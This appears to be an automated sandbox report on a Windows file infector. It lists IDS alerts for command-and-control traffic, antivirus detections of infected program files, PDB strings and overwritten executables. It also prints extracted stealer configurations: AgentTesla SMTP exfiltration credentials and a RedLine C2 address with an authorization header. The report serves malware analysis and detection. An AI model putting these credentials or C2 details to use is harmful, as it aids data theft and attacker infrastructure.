2025-01-10T16:01:28.218699+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49731	TCP
2025-01-10T16:01:31.631469+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49733	TCP
2025-01-10T16:01:52.647077+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49752	TCP
2025-01-10T16:01:54.336434+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49753	TCP
2025-01-10T16:01:55.670330+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49755	TCP
2025-01-10T16:02:00.971436+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49760	TCP
2025-01-10T16:02:01.909396+0100	2018141	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49761	TCP
2025-01-10T16:02:07.204299+0100	2018141	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49785	TCP
2025-01-10T16:02:07.937409+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49793	TCP
2025-01-10T16:02:12.545065+0100	2018141	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49820	TCP
2025-01-10T16:02:32.985038+0100	2018141	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.4	49963	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:01:28.218699+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49731	TCP
2025-01-10T16:01:31.631469+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49733	TCP
2025-01-10T16:01:52.647077+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49752	TCP
2025-01-10T16:01:54.336434+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49753	TCP
2025-01-10T16:01:55.670330+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49755	TCP
2025-01-10T16:02:00.971436+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49760	TCP
2025-01-10T16:02:01.909396+0100	2037771	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49761	TCP
2025-01-10T16:02:07.204299+0100	2037771	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49785	TCP
2025-01-10T16:02:07.937409+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49793	TCP
2025-01-10T16:02:12.545065+0100	2037771	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49820	TCP
2025-01-10T16:02:32.985038+0100	2037771	1	A Network Trojan was detected	3.254.94.185	80	192.168.2.4	49963	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:01:38.504955+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49741	18.141.10.107	80	TCP
2025-01-10T16:02:39.131094+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	50007	34.227.7.138	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RJKUWSGxej.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 5.2.jsc.exe.3879580.2.raw.unpack	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
Source: 5.2.jsc.exe.3879580.2.raw.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Multi AV Scanner detection for submitted file

Source: RJKUWSGxej.exe	ReversingLabs: Detection: 70%
Source: RJKUWSGxej.exe	Virustotal: Detection: 75%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Joe Sandbox ML: detected

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2

Source: RJKUWSGxej.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: alg.exe, 00000007.00000003.2486782688.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdb source: pwahelper.exe.7.dr
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: alg.exe, 00000007.00000003.2590581507.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2591964548.0000000001460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2614730580.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdb@@4 source: jp2launcher.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000007.00000003.2080994679.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000007.00000003.2220561155.0000000001510000.00000004.00001000.00020000.00000000.sdmp, AcroTextExtractor.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000007.00000003.2220561155.0000000001510000.00000004.00001000.00020000.00000000.sdmp, AcroTextExtractor.exe.7.dr
Source:	Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000007.00000003.2243857500.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000007.00000003.2680036714.0000000000440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2674926416.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000007.00000003.2179497222.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: alg.exe, 00000007.00000003.2474420614.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000007.00000003.2658462401.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000007.00000003.2506693136.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2497573438.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdateOnDemand.exe.7.dr
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb source: alg.exe, 00000007.00000003.2564021895.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000007.00000003.2297534087.0000000001580000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000007.00000003.2087017712.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000007.00000003.2243857500.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: alg.exe, 00000007.00000003.2097320751.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: alg.exe, 00000007.00000003.2087017712.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000007.00000003.2590581507.0000000001430000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2591964548.0000000001460000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2614730580.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\BootStrapExe_Small\Release_x64\Setup.pdb} source: alg.exe, 00000007.00000003.2564021895.0000000000400000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\tmp\jp2launcher\obj\jp2launcher.pdb source: jp2launcher.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000007.00000003.2179497222.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000007.00000003.2333518130.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000007.00000003.2080994679.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: alg.exe, 00000007.00000003.2680036714.0000000000440000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2674926416.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: alg.exe, 00000007.00000003.1997141136.00000000015B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000007.00000003.2454674548.0000000001440000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000007.00000003.2658462401.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdb source: firefox.exe.7.dr
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000007.00000003.2422969543.0000000001490000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000007.00000003.2297534087.0000000001580000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: firefox.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000007.00000003.2436327638.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000007.00000003.2333518130.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000007.00000003.2486782688.0000000001560000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdateBroker_unsigned.pdb source: GoogleUpdateBroker.exe.7.dr
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32> source: build.exe, 0000000E.00000002.3150698705.000000000148D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000007.00000003.2474420614.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb` source: alg.exe, 00000007.00000003.1997141136.00000000015B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000007.00000003.2506693136.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000007.00000003.2497573438.0000000001450000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000007.00000003.2348123603.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb8 source: javaws.exe0.7.dr
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdb source: alg.exe, 00000007.00000003.2322680790.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: alg.exe.5.dr
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ALG.pdbGCTL source: alg.exe.5.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\pwahelper.exe.pdbOGP source: pwahelper.exe.7.dr
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000007.00000003.2097320751.00000000014E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb5hG source: build.exe, 0000000E.00000002.3150698705.0000000001410000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbIp source: build.exe, 0000000E.00000002.3150698705.000000000148D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.7.dr
Source:	Binary string: updater.pdb source: updater.exe.7.dr
Source:	Binary string: AppVShNotify.pdb source: alg.exe, 00000007.00000003.2642381591.0000000000430000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000007.00000003.2436327638.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\deploy\jre-image\bin\javaws.pdb source: javaws.exe0.7.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000007.00000003.2348123603.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 00000007.00000003.2322680790.0000000001430000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000007.00000003.2642381591.0000000000430000.00000004.00001000.00020000.00000000.sdmp, AppVShNotify.exe.7.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to behavior
